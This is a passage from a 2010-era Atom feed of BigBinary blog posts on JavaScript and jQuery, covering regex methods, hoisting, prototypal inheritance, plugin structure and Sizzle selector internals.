['hello_you', 'hello_me']</code></pre><h2>Getting multiple matches</h2><p>Once again both <code>exec</code> and <code>match</code> method without <code>g</code> option do not get all thematching values from a string. If you want all the matching values then you needto iterate through the text. Here is an example.</p><p>Get both the bug numbers in the following case.</p><pre><code class="language-javascript">var matches = [];var regex = /#(\d+)/gi;var text = &quot;I fixed bugs #1234 and #5678&quot;;while ((match = regex.exec(text))) {  matches.push(match[1]);}console.log(matches); // ['1234', '5678']</code></pre><p>Note that in the above case global flag <code>g</code>. Without that above code will runforever.</p><pre><code class="language-javascript">var matches = [];var regex = /#(\d+)/gi;var text = &quot;I fixed bugs #1234 and #5678&quot;;matches = text.match(regex);console.log(matches);</code></pre><p>In the above case match is used instead of regex . However since match withglobal flag option brings all the matches there was no need to iterate in aloop.</p><h2>match attributes</h2><p>When a match is made then an array is returned. That array has two methods.</p><ul><li>index: This tells where in the string match was done</li><li>input: the original string</li></ul><pre><code class="language-javascript">var regex = /#(\d+)/i;var text = &quot;I fixed bugs #1234 and #5678&quot;;var match = text.match(regex);console.log(match.index); //13console.log(match.input); //I fixed bugs #1234 and #5678</code></pre><h2>replace</h2><p><a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/String/replace">replace method</a>takes both regexp and string as argument.</p><pre><code class="language-javascript">var text = &quot;I fixed bugs #1234 and #5678&quot;;var output = text.replace(&quot;bugs&quot;, &quot;defects&quot;);console.log(output); //I fixed defects #1234 and #5678</code></pre><p>Example of using a function to replace text.</p><pre><code class="language-javascript">var text = &quot;I fixed bugs #1234 and #5678&quot;;var output = text.replace(/\d+/g, function (match) {  return match * 2;});console.log(output); //I fixed bugs #2468 and #11356</code></pre><p>Another case.</p><pre><code class="language-javascript">// requirement is to change all like within &lt;b&gt; &lt;/b&gt; to love.var text = &quot; I like JavaScript. &lt;b&gt; I like JavaScript&lt;/b&gt; &quot;;var output = text.replace(/&lt;b&gt;.*?&lt;\/b&gt;/g, function (match) {  return match.replace(/like/g, &quot;love&quot;);});console.log(output); //I like JavaScript. &lt;b&gt; I love JavaScript&lt;/b&gt;</code></pre><p>Example of using special variables.</p><pre><code class="language-plaintext">$&amp; -the matched substring.$` -  the portion of the string that precedes the matched substring.$' -  the portion of the string that follows the matched substring.$n -  $0, $1, $2 etc where number means the captured group.</code></pre><pre><code class="language-javascript">var regex = /(\w+)\s(\w+)/;var text = &quot;John Smith&quot;;var output = text.replace(regex, &quot;$2, $1&quot;);console.log(output); //Smith, John</code></pre><pre><code class="language-javascript">var regex = /JavaScript/;var text = &quot;I think JavaScript is awesome&quot;;var output = text.replace(regex, &quot;before:$` after:$' full:$&amp;&quot;);console.log(output); //I think before:I think after: is awesome full:JavaScript is awesome</code></pre><p>Replace method also accepts captured groups as parameters in the function. Hereis an example;</p><pre><code class="language-javascript">var regex = /#(\d*)(.*)@(\w*)/;var text = &quot;I fixed bug #1234 and twitted to @javascript&quot;;text.replace(regex, function (_, a, b, c) {  log(_); //#1234 and twitted to @javascript  log(a); //1234  log(b); //  and twitted to  log(c); // javascript});</code></pre><p>As you can see the very first argument to function is the fully matched text.Other captured groups are subsequent arguments. This strategy can be appliedrecursively.</p><pre><code class="language-javascript">var bugs = [];var regex = /#(\d+)/g;var text = &quot;I fixed bugs #1234 and #5678&quot;;text.replace(regex, function (_, f) {  bugs.push(f);});log(bugs); //[&quot;1234&quot;, &quot;5678&quot;]</code></pre><h2>Split method</h2><p><a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/String/split">split method</a>can take both string or a regular expression.</p><p>An example of split using a string.</p><pre><code class="language-javascript">var text = &quot;Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec&quot;;var output = text.split(&quot;,&quot;);log(output); // [&quot;Jan&quot;, &quot;Feb&quot;, &quot;Mar&quot;, &quot;Apr&quot;, &quot;May&quot;, &quot;Jun&quot;, &quot;Jul&quot;, &quot;Aug&quot;, &quot;Sep&quot;, &quot;Oct&quot;, &quot;Nov&quot;, &quot;Dec&quot;]</code></pre><p>An example of split using regular expression.</p><pre><code class="language-javascript">var text = &quot;Harry Trump ;Fred Barney; Helen Rigby ; Bill Abel ;Chris Hand &quot;;var regex = /\s*;\s*/;var output = text.split(regex);log(output); // [&quot;Harry Trump&quot;, &quot;Fred Barney&quot;, &quot;Helen Rigby&quot;, &quot;Bill Abel&quot;, &quot;Chris Hand &quot;]</code></pre><h2>Non capturing Group</h2><p>The requirement given to me states that I should strictly look for word <code>java</code>,<code>ruby</code> or <code>rails</code> within word boundary. This can be done like this.</p><pre><code class="language-javascript">var text = &quot;java&quot;;var regex = /\bjava\b|\bruby\b|\brails\b/;text.match(regex);</code></pre><p>Above code works. However notice the code duplication. This can be refactored tothe one given below.</p><pre><code class="language-javascript">var text = &quot;rails&quot;;var regex = /\b(java|ruby|rails)\b/;text.match(regex);</code></pre><p>Above code works and there is no code duplication. However in this case I amasking regular expression engine to create a captured group which I'll not beusing. Regex engines need to do extra work to keep track of captured groups. Itwould be nice if I could say to regex engine do not capture this into a groupbecause I will not be using it.</p><p><code>?:</code> is a special symbol that tells regex engine to create non capturing group.Above code can be refactored into the one given below.</p><pre><code class="language-javascript">var text = &quot;rails&quot;;var regex = /\b(?:java|ruby|rails)\b/;text.match(regex);</code></pre><pre><code class="language-javascript">text = &quot;#container a.filter(.top).filter(.bottom).filter(.middle)&quot;;matches = text.match(/^[^.]*|\.[^.]*(?=\))/g);log(matches);</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Get started with nodejs in steps]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/getting-started-with-nodejs-in-steps"/>
      <updated>2010-03-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/getting-started-with-nodejs-in-steps</id>
      <content type="html"><![CDATA[<p><a href="http://nodejs.org">nodejs</a> is awesome. To get people started with nodejs,<a href="http://chat.nodejs.org">node-chat</a> has been developed. Source code fornode-chat app is here (Link is not available) .</p><p>When I looked at source code for the first time, it looked intimidating. Inorder to get started with nodejs, I have developed a small portion of thenode-chat application in 13 incremental steps.</p><p>The first step is as simple as<a href="http://github.com/neerajsingh0101/node-chat-in-steps/raw/step1/server.js">15 lines of code</a>.</p><p>If you want to follow along then go through<a href="http://github.com/neerajsingh0101/node-chat-in-steps">README</a> and you can get afeel of nodejs very quickly. How to checkout each step and other information ismentioned in README.</p><p>Enjoy nodejs.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Two ways of declaring functions]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/two-ways-of-declaring-functions"/>
      <updated>2010-03-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/two-ways-of-declaring-functions</id>
      <content type="html"><![CDATA[<p>All the JavaScript books I read so far do not distinguish between following twoways of declaring a function.</p><pre><code class="language-javascript">var foo = function () {};function foo() {}</code></pre><p>Thanks to <a href="http://www.adequatelygood.com">Ben</a> today I learned that<a href="http://www.adequatelygood.com/2010/2/JavaScript-Scoping-and-Hoisting">there is a difference</a>.</p><h2>When a var is used to declare a function then only the variable declaration gets hoisted up</h2><pre><code class="language-javascript">function test() {  foo();  var foo = function () {    console.log(&quot;foo&quot;);  };}test();</code></pre><p>Above code is same as one given below.</p><pre><code class="language-javascript">function test() {  var foo;  foo();  foo = function () {    console.log(&quot;foo&quot;);  };}test();</code></pre><h2>When a function variable is declared without var then both variable declaration and body gets hoisted up</h2><pre><code class="language-javascript">function test() {  foo();  function foo() {    console.log(&quot;foo&quot;);  }}test();</code></pre><p>Above code is same as one given below.</p><pre><code class="language-javascript">function test() {  var foo;  foo = function () {};  console.log(foo());}test();</code></pre><h2>Conclusion</h2><p>Now it will be clear why <code>foo()</code> does not work in the following case while<code>bar()</code> does work.</p><pre><code class="language-javascript">function test() {  foo(); // TypeError &quot;foo is not a function&quot;  bar(); // &quot;this will run!&quot;  var foo = function () {    // function expression assigned to local variable 'foo'    alert(&quot;this won't run!&quot;);  };  function bar() {    // function declaration, given the name 'bar'    alert(&quot;this will run!&quot;);  }}test();</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Lessons learned from JavaScript quizzes]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/lessons-learned-from-javascript-quizzes"/>
      <updated>2010-03-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/lessons-learned-from-javascript-quizzes</id>
      <content type="html"><![CDATA[<p>Nicholas answered three JavaScript quizzes in his blog. I am not interested inquiz like the one given below</p><pre><code class="language-javascript">var num1 = 5,  num2 = 10,  result = num1++ + num2;</code></pre><p>However some of the questions helped me learn a few things.</p><h2>Questions from quiz</h2><p>Recently there was a<a href="http://www.nczonline.net/blog/2010/02/23/answering-soshnikovs-quiz">quiz</a> out.</p><p>This was question #5 in the original blog. I have modified the quiz a little bitto suit my needs.</p><pre><code class="language-javascript">var x = 10;var foo = {  x: 20,  bar: function () {    var x = 30;    return this.x;  },};// 1console.log(foo.bar());// 2console.log(foo.bar());// 3console.log(foo.bar.call());</code></pre><p>I got the first two answers wrong. In JavaScript a variable and a property aretwo different things. When <code>this.xyx</code> is invoked then JavaScript engine islooking for property called <code>xyz</code>.</p><pre><code class="language-javascript">var bar = function () {  var x = 30;  return this.x;};console.log(bar()); //=&gt; undefined</code></pre><p>In the above case output is <code>undefined</code>. This is because <code>this</code> refers to aproperty named <code>x</code> and since no such property was found <code>undefined</code> is theanswer.</p><pre><code class="language-javascript">var foo = {  x: 20,  bar: function () {    return x;  },};console.log(foo.bar());</code></pre><p>Above code causes <code>ReferenceError</code> because <code>x is not defined</code>. Same theoryapplies here. In this case <code>x</code> is a variable and since no such variable wasfound code failed.</p><p>Coming back to the third part of the original question. This one uses call.</p><pre><code class="language-javascript">console.log(foo.bar.call());</code></pre><p>First argument of <code>call</code> or <code>apply</code> method determines what <code>this</code> would beinside the function. If no argument is passed then JavaScript engine assumesthat <code>this</code> would be global scope which translates to <code>this</code> being <code>window</code>.Hence the answer is <code>10</code> in this case.</p><h2>Questions from another quiz</h2><p>There was another<a href="http://www.nczonline.net/blog/2010/02/18/my-javascript-quiz-answers">quiz</a> .</p><p>In the original blog this is question #2.</p><pre><code class="language-javascript">var x = 5,  o = {    x: 10,    doIt: function doIt() {      var x = 20;      setTimeout(function () {        alert(this.x);      }, 10);    },  };o.doIt();</code></pre><p>The key thing to remember here is that<code>All functions passed into setTimeout() are executed in the global scope</code> .</p><p>In the original blog this is question #5.</p><pre><code class="language-javascript">var o = {    x: 8,    valueOf: function () {      return this.x + 2;    },    toString: function () {      return this.x.toString();    },  },  result = o &lt; &quot;9&quot;;alert(o);</code></pre><p>The thing to remember here is that when comparison is done then <code>valueOf</code> methodis called on the object.</p><h2>Questions from <a href="http://www.nczonline.net/blog/2010/01/26/answering-baranovskiys-javascript-quiz">quiz</a></h2><p>This is question #1 in the original blog.</p><pre><code class="language-javascript">if (!(&quot;a&quot; in window)) {  var a = 1;}alert(a);</code></pre><p>I knew that all the variable declarations are hoisted up but somehow failed toapply that logic here. Please see the original blog for a detailed answer.</p><p>This is question #5 in the original blog.</p><pre><code class="language-javascript">function a() {  alert(this);}a.call(null);</code></pre><p>I knew that if nothing is passed to <code>call</code> method then <code>this</code> becomes global butdid not know that if <code>null</code> is passed then also <code>this</code> becomes global.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Practical example of need for prototypal inheritance]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/pratical-example-of-need-for-prototypal-inheritance"/>
      <updated>2010-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/pratical-example-of-need-for-prototypal-inheritance</id>
      <content type="html"><![CDATA[<p>Alex Sexton wrote <a href="http://alexsexton.com/?p=51">a wonderful article</a> on how touse inheritance pattern to manage large piece of code. His code also has apractical need for prototypal inheritance for writing modular code.</p><h2>Creating standard jQuery plugin</h2><p>Given below is code that does exactly what Alex's code does.</p><pre><code class="language-javascript">$(function () {  $.fn.speaker = function (options) {    if (this.length) {      return this.each(function () {        var defaultOptions = {          name: &quot;No name&quot;,        };        options = $.extend({}, defaultOptions, options);        var $this = $(this);        $this.html(&quot;&lt;p&gt;&quot; + options.name + &quot;&lt;/p&gt;&quot;);        var fn = {};        fn.speak = function (msg) {          $this.append(&quot;&lt;p&gt;&quot; + msg + &quot;&lt;/p&gt;&quot;);        };        $.data(this, &quot;speaker&quot;, fn);      });    }  };});</code></pre><p>For smaller plugins this code is not too bad. However if the plugin is huge thenit presents one big problem. The code for business problem and the code thatdeals with jQuery is all mixed in. What it means is that if tomorrow samefunctionality needs to be implemented for Prototype framework then it is notclear what part of code deals with framework and what part deals with businesslogic.</p><h2>Separating business logic and framework code</h2><p>Given below is code that separates business logic and framework code.</p><pre><code class="language-javascript">var Speaker = function (opts, elem) {  this._build = function () {    this.$elem.html(&quot;&lt;h1&gt;&quot; + options.name + &quot;&lt;/h1&gt;&quot;);  };  this.speak = function (msg) {    this.$elem.append(&quot;&lt;p&gt;&quot; + msg + &quot;&lt;/p&gt;&quot;);  };  var defaultOptions = {    name: &quot;No name&quot;,  };  var options = $.extend({}, defaultOptions, this.opts);  this.$elem = $(elem);  this._build();};$(function () {  $.fn.speaker = function (options) {    if (this.length) {      return this.each(function () {        var mySpeaker = new Speaker(options, this);        $.data(this, &quot;speaker&quot;, mySpeaker);      });    }  };});</code></pre><p>This code is an improvement over first iteration. However the whole businesslogic is captured inside a function. This code can be further improved byembracing object literal style of coding.</p><h2>Final Improvement</h2><p>Third and final iteration of the code is the code presented by Alex.</p><pre><code class="language-javascript">var Speaker = {init: function(options, elem) {this.options = $.extend({},this.options, options);this.elem = elem;this.$elem = $(elem);this._build();},options: {name: &quot;No name&quot;},_build: function() {this.$elem.html('&lt;h1&gt;' + this.options.name + '&lt;/h1&gt;');},speak: function(msg) {this.$elem.append('&lt;p&gt;' + msg + '&lt;/p&gt;');}};// Make sure Object.create is available in the browser (for our prototypal inheritance)if (typeof Object.create !== 'function') {Object.create = function(o) {function F() {}F.prototype = o;return new F();};}$(function() {$.fn.speaker = function(options) {if (this.length) {return this.each(function() {var mySpeaker = Object.create(Speaker);mySpeaker.init(options, this);$.data(this, 'speaker', mySpeaker);});}};</code></pre><p>Notice the Object.create pattern Alex used. The business logic code wasconverted from a function to a JavaScript object. However the problem is thatyou can't create a new on that object. And you need to create new object so thatyou could dole out new objects to each element. Object.create pattern comes torescue.</p><p>This pattern takes a standard Object and returns an instance of a function. Thisfunction has the input object set as prototype. So you get a brand new objectfor each element and you get to have all your business logic in object literalway and not in a function. If you want to know more about prototypal inheritancethen you can read more about it in<a href="prototypal-inheritance-in-javascript">previous blog</a> .</p><p><code>Object.create</code> is now part of<a href="http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf">ECMAScript 5</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Prototypal inheritance in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/prototypal-inheritance-in-javascript"/>
      <updated>2010-03-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prototypal-inheritance-in-javascript</id>
      <content type="html"><![CDATA[<p>One of the key features of JavaScript language is its support for prototypemethod. This feature could be used to bring inheritance in JavaScript.</p><h2>In the beginning there was duplication</h2><pre><code class="language-javascript">function Person(dob) {  this.dob = dob;  this.votingAge = 21;}</code></pre><pre><code class="language-javascript">function Developer(dob, skills) {  this.dob = dob;  this.skills = skills || &quot;&quot;;  this.votingAge = 21;}</code></pre><pre><code class="language-javascript">// create a Person instancevar person = new Person(&quot;02/02/1970&quot;);//create a Developer instancevar developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);</code></pre><p>As you can see both Person and Developer objects have votingAge property. Thisis code duplication. This is an ideal case where inheritance can be used.</p><h2>prototype method</h2><p>Whenever you create a function, that function instantly gets a property calledprototype. The initial value of this prototype property is empty JavaScriptobject <code>{}</code> .</p><pre><code class="language-javascript">var fn = function () {};fn.prototype; //=&gt; {}</code></pre><p>JavaScript engine while looking up for a method in a function first searches formethod in the function itself. Then the engine looks for that method in thatfunctions' prototype object.</p><p>Since prototype itself is a JavaScript object, more methods could be added tothis JavaScript object.</p><pre><code class="language-javascript">var fn = function () {};fn.prototype.author_name = &quot;John&quot;;var f = new fn();f.author_name; //=&gt; John</code></pre><h2>Refactoring code to make use of prototype method</h2><p>Currently Person function is defined like this.</p><pre><code class="language-javascript">function Person(dob) {  this.dob = dob;  this.votingAge = 21;}</code></pre><p>Problem with above code is that every time a new instance of Person is created,two new properties are created and they take up memory. If a million objects arecreated then all instances will have a property called <code>votingAge</code> even thoughthe value of votingAge is going to be same. All the million person instances canrefer to same votingAge method if that method is define in prototype. This willsave a lot of memory.</p><pre><code class="language-javascript">function Person(dob) {  this.dob = dob;}Person.prototype.votingAge = 21;</code></pre><p>The modified solutions will save memory if a lot of objects are created. Howevernotice that now it will a bit longer for JavaScript engine to look for<code>votingAge</code> method. Previously JavaScript engine would have looked for propertynamed <code>votingAge</code> inside the person object and would have found it. Now theengine will not find <code>votingAge</code> property inside the person object. Then enginewill look for person.prototype and will search for <code>votingAge</code> property there.It means, in the modified code engine will find <code>votingAge</code> method in the secondhop instead of first hop.</p><h2>Bringing inheritance using prototype property</h2><p>Currently Person is defined like this.</p><pre><code class="language-javascript">function Person(dob) {  this.dob = dob;}Person.prototype.votingAge = 21;</code></pre><p>If Developer Object wants to extend Person then all that needs to be done isthis.</p><pre><code class="language-javascript">function Developer(dob, skills) {  this.skills = skills || &quot;&quot;;  this.dob = dob;}Developer.prototype = new Person();</code></pre><p>Now Developer instance will have access to <code>votingAge</code> method. This is muchbetter. Now there is no code duplication between Developer and Person.</p><p>However notice that looking for <code>votingAge</code> method from a Developer instancewill take an extra hop.</p><ul><li>JavaScript engine will first look for votingAge property in the Developerinstance object.</li><li>Next engine will look for votingAge property in its prototype property ofDeveloper instance which is an instance of Person. votingAge method is notdeclared in the Person instance.</li><li>Next engine will look for votingAge property in the prototype of Personinstance and this method would be found.</li></ul><p>Since only the methods that are common to both Developer and Person are presentin the Person.prototype there is nothing to be gained by looking for methods inthe Person instance. Next implementation will be removing the middle man.</p><h2>Remove the middle man</h2><p>Here is the revised implementation of Developer function.</p><pre><code class="language-javascript">function Developer(dob, skills) {  this.skills = skills || &quot;&quot;;  this.dob = dob;}Developer.prototype = Person.prototype;</code></pre><p>In the above case Developer.prototype directly refers to Person.prototype. Thiswill reduce the number of hops needed to get to method <code>votingAge</code> by onecompared to previous case.</p><p>However there is a problem. If Developer changes the common property theninstances of person will see the change. Here is an example.</p><pre><code class="language-javascript">Developer.prototype.votingAge = 18;var developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);developer.votingAge; //=&gt; 18var person = new Person();person.votingAge; //=&gt; 18. Notice that votingAge for Person has changed from 21 to 18</code></pre><p>In order to solve this problem Developer.prototype should point to an emptyobject. And that empty object should refer to Person.prototype .</p><h2>Solving the problem by adding an empty object</h2><p>Here is revised implementation for Developer object.</p><pre><code class="language-javascript">function Developer(dob, skills) {  this.dob = dob;  this.skills = skills;}var F = function () {};F.prototype = Person.prototype;Developer.prototype = new F();</code></pre><p>Let's test this code.</p><pre><code class="language-javascript">Developer.prototype.votingAge = 18;var developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);developer.votingAge; //=&gt; 18var person = new Person();person.votingAge; //=&gt; 21</code></pre><p>As you can see with the introduction of empty object, Developer instance havevotingAge of 18 while Person instance have votingAge of 21.</p><h2>Accessing super</h2><p>If child wants to access super object then that should be allowed. That can beaccomplished like this.</p><pre><code class="language-javascript">function Person(dob) {  this.dob = dob;}Person.prototype.votingAge = 21;function Developer(dob, skills) {  this.dob = dob;  this.skills = skills;}var F = function () {};F.prototype = Person.prototype;Developer.prototype = new F();Developer.prototype.__super = Person.prototype;Developer.prototype.votingAge = 18;</code></pre><h3>Capturing it as a pattern</h3><p>The whole thing can be captured in a helper method that would make it simple tocreate inheritance.</p><pre><code class="language-javascript">var extend = function (parent, child) {  var F = function () {};  F.prototype = parent.prototype;  child.prototype = new F();  child.prototype.__super = parent.prototype;};</code></pre><h2>Pure prototypal inheritance</h2><p>A simpler form of pure prototypal inheritance can be structured like this.</p><pre><code class="language-javascript">if (typeof Object.create !== &quot;function&quot;) {  Object.create = function (o) {    function F() {}    F.prototype = o;    return new F();  };}</code></pre><p>Before adding the create method to object, I checked if this method alreadyexists or not. That is important because <code>Object.create</code> is part of ECMAScript 5and slowly more and more browsers will start adding that method natively toJavaScript.</p><p>You can see that Object.create takes only one parameter. This method does notnecessarily create a parent child relationship . But it can be a very good toolin converting an object literal to a function.</p>]]></content>
    </entry><entry>
       <title><![CDATA[return false considered harmful in live]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/return-false-considered-harmful-in-live-jquery"/>
      <updated>2010-03-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/return-false-considered-harmful-in-live-jquery</id>
      <content type="html"><![CDATA[<p>Checkout following jQuery code written with jQuery.1.4.2. What do you think willhappen when first link is clicked.</p><pre><code class="language-javascript">$(&quot;a:first&quot;).live(&quot;click&quot;, function () {  log(&quot;clicked once&quot;);  return false;});$(&quot;a:first&quot;).live(&quot;click&quot;, function () {  log(&quot;clicked twice&quot;);  return false;});</code></pre><p>I was expecting that I would see both the messages. However jQuery only invokesthe very first message.</p><p><code>return false</code> does two things. It stops the default behavior which is go andfetch the link mentioned in the <code>href</code> of the anchor tags. Also it stops theevent from bubbling up. Since live method relies on event bubbling, it makessense that second message does not appear.</p><p>Fix is simple. Just block the default action but let the event bubble up.</p><pre><code class="language-javascript">$(&quot;a:first&quot;).live(&quot;click&quot;, function (e) {  log(&quot;clicked once&quot;);  e.preventDefault();});$(&quot;a:first&quot;).live(&quot;click&quot;, function (e) {  log(&quot;clicked twice&quot;);  e.preventDefault();});</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Simplest jQuery slideshow code explanation]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/simplest-jquery-slideshow-code-explanation"/>
      <updated>2010-02-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/simplest-jquery-slideshow-code-explanation</id>
      <content type="html"><![CDATA[<p><a href="http://snook.ca">Jonathan Snook</a> wrote a blog titled<a href="http://snook.ca/archives/javascript/simplest-jquery-slideshow">Simplest jQuery SlideShow</a>.Checkout the <a href="http://snook.ca/technical/fade/fade.html">demo page</a>. The fullJavaScript code in its entirety is given below. If you understand this code thenyou don't need to read rest of the article.</p><pre><code class="language-javascript">$(function () {  $(&quot;.fadein img:gt(0)&quot;).hide();  setInterval(function () {    $(&quot;.fadein :first-child&quot;)      .fadeOut()      .next(&quot;img&quot;)      .fadeIn()      .end()      .appendTo(&quot;.fadein&quot;);  }, 3000);});</code></pre><h2>appendTo removes and attaches elements</h2><p>In order to understand what's going on above, I am constructing a simple testpage. Here is the html markup.</p><pre><code class="language-html">&lt;div id=&quot;container&quot;&gt;  &lt;div class=&quot;lab&quot;&gt;This is div1&lt;/div&gt;  &lt;div class=&quot;lab&quot;&gt;This is div2&lt;/div&gt;&lt;/div&gt;</code></pre><p>Open this page in browser and execute following command in firebug.</p><pre><code class="language-javascript">$(&quot;.lab:first&quot;).appendTo(&quot;#container&quot;);</code></pre><p>Run the above command 5/6 times to see its effect. Every single time you runJavaScript the order is changing.</p><p>The order of <code>div</code> elements with class <code>lab</code> is changing because if a jQueryelement is already part of document and that element is being added somewhereelse then jQuery will do <code>cut and paste</code> and <em>not</em> <code>copy and paste</code> . Againelements that already exist in the document get plucked out of document and thenthey are inserted somewhere else in the document.</p><h2>Back to the original problem</h2><p>In the original code the very first image is being plucked out of document andthat image is being added to set again. In simpler terms this is what ishappening. Initially the order is like this.</p><pre><code class="language-plaintext">Image1Image2Image3</code></pre><p>After the code is executed the order becomes this.</p><pre><code class="language-plaintext">Image2Image3Image1</code></pre><p>After the code is executed again then the order becomes this.</p><pre><code class="language-plaintext">Image3Image1Image2</code></pre><p>After the code is executed again then the order becomes this.</p><pre><code class="language-plaintext">Image1Image2Image3</code></pre><p>And this cycle continues forever.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How jQuery selects elements using Sizzle]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-jquery-selects-elements-using-sizzle"/>
      <updated>2010-02-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-jquery-selects-elements-using-sizzle</id>
      <content type="html"><![CDATA[<p>jQuery's motto is to select something and do something with it. As jQuery users,we provide the selection criteria and then we get busy with doing something withthe result. This is a good thing. jQuery provides extremely simple API forselecting elements. If you are selecting ids then just prefix the name with '#'.If you are selecting a class then prefix it with '.'.</p><p>However it is important to understand what goes on behind the scene for manyreasons. And one of the important reasons is the performance of Rich Client. Asmore and more web pages use more and more jQuery code, understanding of howjQuery selects elements will speed up the loading of pages.</p><h2>What is a selector engine</h2><p>HTML documents are full of html markups. It's a tree like structure. Ideallyspeaking all the html documents should be 100% valid xml documents. However ifyou miss out on closing a div then browsers forgive you ( unless you have askedfor strict parsing). Ultimately browser engine sees a well formed xml document.Then the browser engine renders that xml on the browser as a web page.</p><p>After a page is rendered then those xml elements are referred as DOM elements.</p><p>JavaScript is all about manipulating this tree structure (DOM elements) thatbrowser has created in memory. A good example of manipulating the tree iscommand like the one give below which would hide the header element. However inorder to hide the header tag, jQuery has to get to that DOM element.</p><pre><code class="language-javascript">jQuery(&quot;#header&quot;).hide();</code></pre><p>The job of a selector engine is to get all the DOM elements matching thecriteria provided by a user. There are many JavaScript selector engines in themarket. Paul Irish has<a href="http://paulirish.com/2008/javascript-css-selector-engine-timeline">a nice article</a>about JavaScript CSS Selector Engine timeline .</p><p><a href="http://sizzlejs.com">Sizzle</a> is JavaScript selector engine developed by<a href="http://ejohn.org">John Resig</a> and is used internally in jQuery. In this articleI will be showing how jQuery in conjunction with Sizzle finds elements.</p><h2>Browsers help you to get to certain elements</h2><p>Browsers do provide some helper functions to get to certain types of elements.For example if you want to get DOM element with id <code>header</code> then<code>document.getElementById</code> function can be used like this</p><pre><code class="language-javascript">document.getElementById(&quot;header&quot;);</code></pre><p>Similarly if you want to collect all the p elements in a document then you coulduse following code .</p><pre><code class="language-javascript">document.getElementsByTagName(&quot;p&quot;);</code></pre><p>However if you want something complex like the one given below then browserswere not much help. It was possible to walk up and down the tree howevertraversing the tree was tricky because of two reasons: a) DOM spec is not veryintuitive b) Not all the browsers implemented DOM spec in same way.</p><pre><code class="language-javascript">jQuery(&quot;#header a&quot;);</code></pre><p>Later <a href="http://www.w3.org/TR/selectors-api">selector API</a> came out.</p><p>The latest version of all the major browsers support this specificationincluding IE8. However IE7 and IE6 do not support it. This API provides<code>querySelectorAll</code> method which allows one to write complex selector query like<code>document.querySelectorAll(&quot;#score&gt;tbody&gt;tr&gt;td:nth-of-type(2)&quot;</code> .</p><p>It means that if you are using IE8 or current version of any other modernbrowser then jQuery code <code>jQuery('#header a')</code> will not even hit Sizzle. Thatquery will be served by a call to <code>querySelectorAll</code> .</p><p>However if you are using IE6 or IE7, Sizzle will be invoked for jQuery('#headera'). This is one of the reasons why some apps perform much slower on IE6/7compared to IE8 since a native browser function is much faster than elementsretrieval by Sizzle.</p><h2>Selection process</h2><p>jQuery has a lot of optimization baked in to make things run faster. In thissection I will go through some of the queries and will try to trace the routejQuery follows.</p><h2>$('#header')</h2><p>When jQuery sees that the input string is just one word and is looking for an idthen jQuery invokes document.getElementById . Straight and simple. Sizzle is notinvoked.</p><h2>$('#header a') on a modern browser</h2><p>If the browser supports querySelectorAll then querySelectorAll will satisfy thisrequest. Sizzle is not invoked.</p><h2>$('.header a[href!=&quot;hello&quot;]') on a modern browser</h2><p>In this case jQuery will try to use querySelectorAll but the result would be anexception (at least on firefox). The browser will throw an exception because thequerySelectorAll method does not support certain selection criteria. In thiscase when browser throws an exception, jQuery will pass on the request toSizzle. Sizzle not only supports css 3 selector but it goes above and beyondthat.</p><h2>$('.header a') on IE6/7</h2><p>On IE6/7 <code>querySelectorAll</code> is not available so jQuery will pass on this requestto Sizzle. Let's see a little bit in detail how Sizzle will go about handlingthis case.</p><p>Sizzle gets the selector string '.header a'. It splits the string into two partsand stores in variable called parts.</p><pre><code class="language-javascript">parts = [&quot;.header&quot;, &quot;a&quot;];</code></pre><p>Next step is the one which sets Sizzle apart from other selector engines.Instead of first looking for elements with class <code>header</code> and then going down,Sizzle starts with the outer most selector string. As per<a href="https://www.paulirish.com/2009/perf/">this presentation</a> from Paul Irish<a href="https://yuilibrary.com/">YUI3</a> and NWMatcher (Link is not available) also goright to left.</p><p>So in this case Sizzle starts looking for all <code>a</code> elements in the document.Sizzle invokes the method <code>find</code>. Inside the find method Sizzle attempts to findout what kind of pattern this string matches. In this case Sizzle is dealingwith string <code>a</code> .</p><p>Here is snippet of code from Sizzle.find .</p><pre><code class="language-plaintext">match: {     ID: /#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,     CLASS: /\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,     NAME: /\[name=['&quot;]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['&quot;]*\]/,     ATTR: /\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['&quot;]*)(.*?)\3|)\s*\]/,     TAG: /^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,     CHILD: 